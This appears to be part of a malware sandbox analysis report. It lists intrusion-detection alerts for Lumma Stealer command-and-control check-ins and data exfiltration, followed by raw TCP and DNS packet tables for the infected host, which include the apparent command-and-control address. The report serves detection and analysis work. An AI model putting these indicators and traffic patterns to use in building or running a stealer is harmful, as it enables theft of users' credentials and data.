| 2025-01-14T18:01:13.594418+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:14.083227+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:14.083227+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:14.833090+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49728 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:16.415374+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49737 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:17.485915+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49745 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:18.529051+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49751 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:18.991769+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.10 | 49751 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:19.821171+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49761 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:19.827392+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.10 | 49761 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:23.192598+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49782 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:23.963228+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49782 | 188.114.97.3 | 443 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jan 14, 2025 18:01:09.971975088 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:09.972011089 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:09.972276926 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:09.973572016 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:09.973583937 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:10.624577045 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:10.624645948 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:10.629590034 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:10.629595995 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:10.629839897 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:10.677546978 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.067842007 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.111356974 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.784202099 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.784223080 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.784261942 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.784275055 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.784302950 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.784317970 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.784317970 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.784324884 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.784332991 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.784359932 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.784394026 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.885795116 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.885819912 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.885905027 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.885905027 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.885914087 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.885984898 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.890713930 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.890783072 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.895344019 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.895402908 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.895409107 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.895420074 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.895476103 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.896020889 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.896035910 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.896053076 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
| Jan 14, 2025 18:01:11.896058083 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.908797026 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:11.908840895 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:11.909486055 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:11.909794092 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:11.909806967 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:12.371978045 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:12.372040033 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:12.373469114 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:12.373475075 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:12.373713017 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:12.375015974 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:12.375065088 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:12.375073910 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:13.123927116 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:13.124011993 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:13.124109983 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:13.124636889 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:13.124659061 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:13.124670982 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:13.124676943 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:13.136827946 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:13.136877060 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:13.136943102 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:13.137213945 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:13.137229919 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:13.594353914 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:13.594418049 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:13.595927000 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:13.595936060 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:13.596178055 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:13.597467899 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:13.597493887 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:13.597532034 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.083225965 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.083278894 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.083309889 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.083352089 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.083376884 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.083408117 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.083420038 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.083479881 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.083506107 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.083550930 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.083559990 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.083664894 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.084177971 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.088865042 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.088892937 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.088917971 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.088922977 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.088937044 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.088984013 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.170092106 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.170155048 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.170211077 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.170238018 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.170253992 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.170301914 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.170511961 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.170528889 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.170537949 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.170542955 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.250034094 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.250080109 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.250375032 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.251336098 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.251358986 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.832950115 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.833090067 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.834472895 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.834481001 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.834743023 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:14.836106062 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.836714983 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:14.836764097 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:15.765527964 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:15.765614986 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:15.765856028 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:15.816546917 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:15.816585064 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:15.911277056 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:15.911303043 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:15.911362886 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:15.911637068 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:15.911652088 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:16.415299892 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:16.415374041 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:16.417007923 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:16.417023897 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:16.417294025 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:16.418683052 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:16.418847084 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:16.418888092 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:16.418939114 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:16.459331989 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:16.909528017 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:16.909657955 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:16.909725904 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:16.909849882 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:16.909871101 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:17.021035910 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:17.021094084 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:17.021189928 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:17.021688938 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:17.021708965 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:17.485676050 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:17.485914946 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:17.487227917 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:17.487234116 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:17.487478018 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:17.488759995 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:17.488931894 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:17.488955975 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:17.489047050 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:17.489056110 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:17.975634098 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:17.975755930 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:17.975810051 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:17.976016045 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:17.976035118 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:18.069391966 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:18.069426060 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:18.069499969 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:18.069756031 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:18.069768906 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:18.528961897 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:18.529051065 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:18.530316114 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:18.530329943 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:18.530612946 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:18.532210112 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:18.532210112 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:18.532267094 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:18.991791964 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:18.991883039 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:18.992021084 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:18.992149115 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:18.992171049 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.344208002 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.344248056 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.344347000 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.344767094 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.344779015 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.821060896 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.821171045 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.822504044 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.822509050 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.822828054 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.825705051 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.826838017 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.826858044 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.826955080 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.826970100 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.827203035 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.827219963 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.827336073 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.827366114 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.827491999 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.827506065 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.827637911 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.827661991 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.827670097 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.827675104 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.827802896 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.827816963 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.827833891 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.827852964 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.827934980 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.827958107 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.827975035 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.839077950 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:19.839234114 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.839260101 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.839281082 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:19.839335918 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:22.597553968 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:22.597677946 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:22.597740889 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:22.614237070 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:22.614257097 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:22.731779099 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:22.731803894 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:22.731873035 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:22.734308004 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:22.734321117 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:23.192516088 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:23.192598104 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:23.194139004 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:23.194149017 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:23.194397926 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:23.195614100 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:23.195636988 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:23.195694923 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:23.963156939 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:23.963255882 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
| Jan 14, 2025 18:01:23.963323116 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:23.963587046 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
| Jan 14, 2025 18:01:23.963601112 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jan 14, 2025 18:01:09.868068933 CET | 54196 | 53 | 192.168.2.10 | 1.1.1.1 |
| Jan 14, 2025 18:01:09.876349926 CET | 53 | 54196 | 1.1.1.1 | 192.168.2.10 |
| Jan 14, 2025 18:01:09.877880096 CET | 64828 | 53 | 192.168.2.10 | 1.1.1.1 |
| Jan 14, 2025 18:01:09.886950016 CET | 53 | 64828 | 1.1.1.1 | 192.168.2.10 |
| Jan 14, 2025 18:01:09.890770912 CET | 57637 | 53 | 192.168.2.10 | 1.1.1.1 |
| Jan 14, 2025 18:01:09.900130987 CET | 53 | 57637 | 1.1.1.1 | 192.168.2.10 |
| Jan 14, 2025 18:01:09.903270960 CET | 57333 | 53 | 192.168.2.10 | 1.1.1.1 |
| Jan 14, 2025 18:01:09.911900043 CET | 53 | 57333 | 1.1.1.1 | 192.168.2.10 |
| Jan 14, 2025 18:01:09.914056063 CET | 54253 | 53 | 192.168.2.10 | 1.1.1.1 |
| Jan 14, 2025 18:01:09.923238039 CET | 53 | 54253 | 1.1.1.1 | 192.168.2.10 |
| Jan 14, 2025 18:01:09.924696922 CET | 57389 | 53 | 192.168.2.10 | 1.1.1.1 |
| Jan 14, 2025 18:01:09.933404922 CET | 53 | 57389 | 1.1.1.1 | 192.168.2.10 |
| Jan 14, 2025 18:01:09.936321974 CET | 62955 | 53 | 192.168.2.10 | 1.1.1.1 |
| Jan 14, 2025 18:01:09.945915937 CET | 53 | 62955 | 1.1.1.1 | 192.168.2.10 |
| Jan 14, 2025 18:01:09.947254896 CET | 64010 | 53 | 192.168.2.10 | 1.1.1.1 |
| Jan 14, 2025 18:01:09.958478928 CET | 53 | 64010 | 1.1.1.1 | 192.168.2.10 |
